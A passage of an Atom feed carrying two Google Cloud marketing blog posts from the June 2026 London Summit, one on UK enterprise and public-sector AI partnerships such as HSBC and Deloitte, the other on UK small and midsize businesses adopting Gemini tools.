&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This transition is the cornerstone of the UK’s projected &lt;/span&gt;&lt;a href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/ai-potential-uk/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;£400 billion economic boost from AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; by 2030. At Google Cloud, we are the only provider offering &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/ai-infrastructure-at-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;the full integrated stack&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; — custom silicon, frontier models, and planet-scale infrastructure — required to turn the Agentic Enterprise into a reality.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The new frontier of British enterprise and research&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The banking sector is a key proving ground for this shift. And &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;HSBC&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, one of the largest and most important financial institutions in the world, is showing the way. Today, we’re &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-17-HSBC-AND-GOOGLE-CLOUD-ANNOUNCE-TRANSFORMATIVE-AI-BANKING-PARTNERSHIP" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;announcing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; a multi-year transformational partnership with HSBC to accelerate AI adoption across HSBC’s products and services globally. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;This new collaboration will further accelerate the shift towards AI-enabled ways of working across HSBC’s global operations. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;HSBC will work with Google Cloud and Google DeepMind engineering teams to collaborate on new AI-powered tools and programmes, with access to Google’s latest agentic AI capabilities – including Gemini models and the Gemini Enterprise Agent Platform. &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;The initial delivery focus on three areas: hyper‑personalised wealth management support, stronger financial crime risk management, and AI tools to enhance frontline/relationship manager client service&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UK startups also continue to break new ground with technology, and AI in particular, as demonstrated by the work of frontier labs like &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-16-Ineffable-Intelligence-Selects-Google-Cloud-To-Power-Its-Superintelligence-Mission" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Ineffable Intelligence&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; The company, which launched earlier this year, has chosen Google Cloud as its preferred cloud partner, utilizing Google’s full stack of AI-optimized hardware and tools to build and train Ineffable’s first generation of foundational models. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Led by David Silver, a former Google DeepMind researcher who &lt;/span&gt;&lt;a href="https://deepmind.google/research/alphago/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;was instrumental in the AlphaGo project&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Ineffable Intelligence is taking a unique approach to AI development. The team are building systems that learn primarily through their own experience through &lt;/span&gt;&lt;a href="https://cloud.google.com/discover/what-is-reinforcement-learning?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;reinforcement learning&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; instead of relying on the large-scale human-generated datasets behind language models. The ambition is to create a “superlearner” that develops knowledge through trial and error. This year, Ineffable Intelligence set a record for a European seed funding round of $1.1 billion, and now Ineffable Intelligence will support its training work by deploying one of the largest clusters of A5X, powered by the NVIDIA Vera Rubin NVL72 platform on Google Cloud, delivering massive computational scale.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To move from experimentation to true industrial production, businesses need more than just models; they need a roadmap. To help show them the way, we’re expanding our partnership with &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-17-Deloitte-and-Google-Cloud-Collaborate-to-Launch-London-AI-Studio-to-Spearhead-UKs-Transition-to-Agentic-AI" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Deloitte&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which will open a new AI Studio at its London campus. Developed in collaboration with Google Cloud, the studio will help British organisations move beyond AI experimentation to deploy autonomous, action-oriented AI systems at scale. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deloitte is also committing to upskill 1,000 members of its UK AI and data workforce on &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise?utm_source=google&amp;amp;utm_medium=cpc&amp;amp;utm_campaign=1713762-Gemini_Enterprise-DR-NA-US-en-Google-BKWS-EXA-GEnterprise&amp;amp;utm_content=c-Hybrid+%7C+BKWS+-+MIX+%7C+Txt_Gemini+Enterprise-189528400785&amp;amp;utm_term=gemini+enterprise&amp;amp;gclsrc=aw.ds&amp;amp;gad_source=1&amp;amp;gad_campaignid=23370621055&amp;amp;gclid=CjwKCAjwxb7RBhA5EiwAQ-AAdKh3HIPjJKRwMUI9Oxjo06q7orhp2vGKY396Yd4ENN8oULqQrQ2vkhoCAqQQAvD_BwE&amp;amp;e=48754805&amp;amp;hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This certification program will ensure that Deloitte’s AI and data engineers’ are equipped with the technical expertise to implement Google’s most advanced agentic architecture, providing UK clients with one of the largest pools of certified AI talent in the region.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Building a future-ready public sector&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The blueprint for a modern digital government requires moving away from rigid legacy contracts toward agile, AI-driven public services. In collaboration with the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Ministry of Housing, Communities and Local Government (MHCLG)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;i.AI &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;incubator, Google Deepmind, and Faculty, we are delivering &lt;/span&gt;&lt;a href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/google-cloud-summit-london-2026" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tangible public sector reform and tools for reinvention&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that directly support the national goal to "get Britain building."&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agencies like MHCLG are already using a tool called Extract which was built using Google technology to help transform planning processes by reducing document processing times from two hours to just two minutes. Simultaneously, we are supporting trials of an AI planning tool — co-created with local planning authorities in Barnet, Dorset, and Camden — which aims to cut decision times for everyday applications by 50%. Furthermore, &lt;/span&gt;&lt;a href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/uk-department-for-transport-accelerates-public-policy-insights-with-google-cloud-ai/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;the Department for Transport (DfT)&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;is utilizing Gemini to streamline public consultation analysis, a move projected to save £4 million annually.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Innovation on this scale also requires a secure, sovereign foundation. That is why Google Cloud is working to strengthen our UK data residency commitments, including measures like making Gemini 3.5 Flash, which features in-country AI processing, available by late June 2026 for sensitive sovereign use cases. We are giving British organizations the confidence to innovate within strict compliance boundaries.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help keep businesses safe from the challenges posed by bad actors using AI and other digital threats, we also recently announced a &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;comprehensive AI-powered cybersecurity platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; — Google AI Threat Defense — which combines Wiz, Mandiant, Gemini &amp;amp; CodeMender to find, fix, and protect our customers from vulnerabilities.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Proven impact from the high street to public service&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Autonomous agents are no longer a future prospect; they are delivering value across the UK economy today. Our work with &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-17-THG-Ingenuity-Launches-AI-Shopping-Assistant-in-Collaboration-with-Google-Cloud,-Driving-8x-Higher-Conversions" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;THG Ingenuity&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; an ecommerce solutions provider, has delivered an 8x higher conversion rate via its AI Shopping Assistant. &lt;/span&gt;&lt;a href="https://www.starlingbank.com/news/starling-launches-pioneering-ai-banking-tool/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Starling&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;is similarly empowering customers with "spending intelligence" tools for instant habit analysis around purchases and expenses. And Rightmove, has launched a beta version of an AI-powered conversational property search, built with Google’s Gemini models, enabling users to search for homes in their own words.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The breadth of this impact is visible across every sector: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Txfm-3RZ1GQ&amp;amp;t=2s" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Kingfisher&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is pioneering retail-specific agentic applications; &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-03-25-Openreach-Taps-Google-Cloud-AI-to-Accelerate-High-Speed-Internet-Access-and-Cut-Carbon,1" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Openreach&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is driving field service optimization in telecommunications; andUnilever is using AI at scale across the entire value chain to drive growth and build desirable brands in the new era of consumer goods.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Meanwhile, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;VMO2&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; is streamlining complex data operations; &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2024-10-08-Vodafone-and-Google-Deepen-Strategic-Partnership-with-Ten-Year,-Billion-Dollar-Deal-including-Cloud,-Cybersecurity-and-Devices-Across-Europe-and-Africa" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Vodafone&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is executing a $1 billion partnership to redefine network performance; and &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;WPP is integrating Gemini across creative workflows, whether that's generating high-fidelity campaign assets at speed and scale, powering AI agents, or training &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/infrastructure/wpp-humanoid-robots-ai-training?e=48754805"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;robotic camera operators&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Empowering the engine of growth for small to medium businesses and startups &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The true measure of Britain’s AI success &lt;/span&gt;&lt;a href="https://cloud.google.com/topics/startups/london-summit-2026-smb-sme-ai-innovation"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;lies in its small and medium enterprises&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and startup ecosystem. Our AI Works research highlights a pivotal moment: AI has the potential to boost productivity for small and medium enterprises by 20% and unlock £198 billion in output for the UK economy. With 56% of smaller firms already seeking guidance, we have launched the &lt;/span&gt;&lt;a href="https://about.google/intl/ALL_uk/around-the-globe/local-info/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AI Works for Britain&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; upskilling&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; initiative to ensure no business is left behind.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We also continue to foster the next generation of British unicorn startups through &lt;/span&gt;&lt;a href="https://technation.io/london-ai-hub-partnership-withhttps://technation.io/london-ai-hub-partnership-with-google-cloud/-google-cloud/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;our ongoing partnership with Tech Nation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; at the London AI Hub. This sustained commitment ensures founders have the resources and community needed to scale, and this September, we will further this mission by hosting the&lt;/span&gt;&lt;a href="https://startup.google.com/programs/gemini-startup-forum/cyber-security/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; Gemini Startup Forum: Cybersecurity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in London to help startups build secure-by-design AI applications. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The Model Garden&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; at &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Platform 37&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our belief in the UK’s potential is reflected in our physical footprint, too. We are continuing to invest in the UK's digital infrastructure to support growing demand: Our state-of-the-art data center in Waltham Cross launched in September 2025, a key part of our two-year, £5 billion investment to help power the UK's AI economy. And earlier this year, we opened our new&lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;office in London in Kings Cross, &lt;/span&gt;&lt;a href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/platform-37-the-ai-exchange/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Platform 37&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, along with plans for The AI Exchange, a new public space dedicated to deepening understanding of AI. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building on this momentum, we are excited to introduce &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-17-Google-Clouds-Model-Garden-at-Platform-37-An-Exclusive-Customer-Hub-for-AI-Innovation-and-Collaboration" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;The Model Garden at Platform 37,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; launching in the fourth quarter of 2026. This London-based hub is far more than a physical space; it serves as a strategic investment designed to fundamentally elevate how we engage with our most important customers. Blending the timeless aesthetics of a classic English garden with immersive, high-tech innovation — from living digital walls to a three-story atrium — The Model Garden acts as a physical marketplace for our best ideas. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The blueprint for the agentic enterprise&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For UK businesses, civic leaders, and organizations to continue to lead in the AI moment, they must not only rethink the technology they use but also fundamental aspects of how we work. As we support thousands of organizations and millions of teams here and around the globe, we see three core strategies helping achieve success with AI:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Culture:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We must reimagine our organizations for the future. True transformation means getting teams excited, enabled, and equipped to work with AI agents in completely new ways. It is about human-AI collaboration, not just automation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Responsibility:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We must build with safety and security in mind from day one. Protecting your users, your customers, and your brand is paramount. Our frontier models are built on a foundation of rigorous AI principles and secure-by-design infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Sustainability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; In an era of rising compute demands, we must scale in a way that is both financially viable and positive for our planet. At Google, we are committed to carbon-free energy 24/7, ensuring that the UK’s AI growth does not come at the cost of our climate goals.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Architecting the future together&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud is the primary partner for the UK’s agentic transition. We are moving beyond the hype of experimentation into the rigor of production. From the research labs of King's Cross to the diverse enterprises powering the high street, we are architecting a resilient, sovereign, and prosperous future for the United Kingdom. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Thank you to everyone who’s joining us in London — yesterday, today, and into the future. This year we’ve packaged up an &lt;/span&gt;&lt;a href="https://www.googlecloudevents.com/london-summit?utm_content=online_blog&amp;amp;utm_source=cloud_sfdc&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-EMEA-EME39630-physicalevent-er-London-Summitmc-168582" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;exclusive on-demand experience&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, allowing you to stream the defining London Summit moments, available anywhere, anytime.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/inside-google-cloud/london-summit-2026-uk-leads-agentic-enterprise-ai-infrastructure-data-cloud/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-17T08:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/startups/london-summit-2026-smb-sme-ai-innovation/</id>
    <title>How growing UK midsize businesses are building in the AI era</title>
    <updated>2026-06-17T08:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The UK’s 5-million-plus small and midsize businesses and enterprises (SMBs) are the backbone of our economy. Today, we’re seeing these critical businesses begin to put AI to work, to operate more efficiently, move faster, and ultimately deliver better outcomes for their customers. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This shift is driven by tangible day-to-day results. According to &lt;/span&gt;&lt;a href="https://www.enterprisenation.com/learn-something/one-in-five-small-businesses-regularly-use-ai-new-enterprise-nation-research-finds/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;recent research&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; from Enterprise Nation published in partnership with Google, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;71% of AI adopters &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;surveyed in the UK say the technology helps them &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;save time on routine tasks, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;and&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; 64% &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;report a direct &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;boost in productivity&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. On top of this, AI-enabled productivity tools (like Google Workspace with Gemini) are delivering a &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2025-10-08-Google-Reveals-AIs-Potential-to-Supercharge-British-Small-Business-Innovation#:~:text=SME%20leaders%20believe%20these%20innovations,them%20an%20extra%20working%20day." rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;20% boost in productivity for SMBs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which effectively hands them back one full working day every single week.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, we have a front row seat to this shift: SMBs have long utilized platforms like Google Workspace, and today they’re transforming with Google’s AI platform and models. In fact, we’ve seen the number of UK-based SMBs using Google Cloud AI &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;nearly double year-over-year.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This includes our Gemini models and products like Gemini Enterprise and AI Studio, which are helping SMBs do things like:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Roll out better customer support systems to help escalate and resolve customer support calls more quickly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Automate repetitive actions in areas like payroll and accounting.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Help more employees understand and leverage data at work — even those not trained as data analysts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Rapidly create and implement new designs for marketing collateral.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Help more people build their own AI agents to help them in their everyday jobs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conduct complex research projects at a speed and price point previously unavailable.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At today’s &lt;/span&gt;&lt;a href="https://www.googlecloudevents.com/london-summit?utm_content=online_blog&amp;amp;utm_source=cloud_sfdc&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-EMEA-EME39630-physicalevent-er-London-Summitmc-168582" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud London Summit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we’re showcasing a number of innovative SMB customers who are actively using our AI tools to transform how they work, including companies who have recently expanded their work with us:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Neural Alpha&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a sustainability fintech company, is using Gemini models to read unstructured environmental and corporate sustainability reports to automatically find and organize thousands of key facts, cutting months of slow, manual research down to a fraction of the time.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Sep 2&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a digital security provider, uses Gemini Enterprise to deploy autonomous AI agents for 24/7 threat monitoring — accelerating incident detection and quickly neutralizing security threats for its customers. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Sunhouse,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; a strategic brand design agency, uses Gemini Enterprise to easily find archived design work stored on Google Drive, enabling its teams to spend less time hunting for files and more time growing its business with global brands.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Terrapinn&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a global B2B events company, is transforming its operations by leveraging Gemini models, NotebookLM, Looker, and BigQuery to turn manual tasks into automated workflows, accelerating how its teams design, market, and deliver world-class conferences.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;VoCoVo&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a telecommunications provider, is integrating Google Cloud AI across its systems to turn isolated data into actionable intelligence and build autonomous workflows, streamlining routine operations so their team can focus on high-impact innovation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Empowering Your Team: AI Upskilling Resources for Growing British Businesses&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help midsize teams maximize their impact and confidently navigate the modern AI landscape, we’ve developed a suite of dedicated, no-cost upskilling resources. Whether you want to train your existing teams or democratize data tools across your entire workforce, these programs will help you build an AI-ready organization:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SMB-Focused Programs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Explore our new&lt;/span&gt; &lt;a href="https://www.skills.google/paths/4020?utm_campaign=SMB-learning-path" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SMB Learning Path&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or enroll in the &lt;/span&gt;&lt;a href="https://developers.google.com/program/gear" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Ready&lt;/span&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;(GEAR) program for specialized training in agentic AI.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="http://skills.google/learningcenter" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Google Skills for Organizations&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Access our no-cost, on-demand learning platform featuring over 3,000 AI courses and hands-on labs created by experts at Google Cloud and Google DeepMind.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://developers.google.com/program/gear/getcertified/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Get Certified&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Ready to validate your team's expertise? This premium, cohort-based program offers instructor-led training, technical mentorship, and AI-infused skill badges designed to prepare your team for industry-recognized certifications.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By offering a full suite of SMB technology and training — from productivity in Workspace, to all our Ads services, and now powerful AI tools — Google is helping small and midsize firms thrive, no matter where the future takes us. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/startups/london-summit-2026-smb-sme-ai-innovation/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-17T08:00:00+00:00</published>
  </entry>
  <entry>
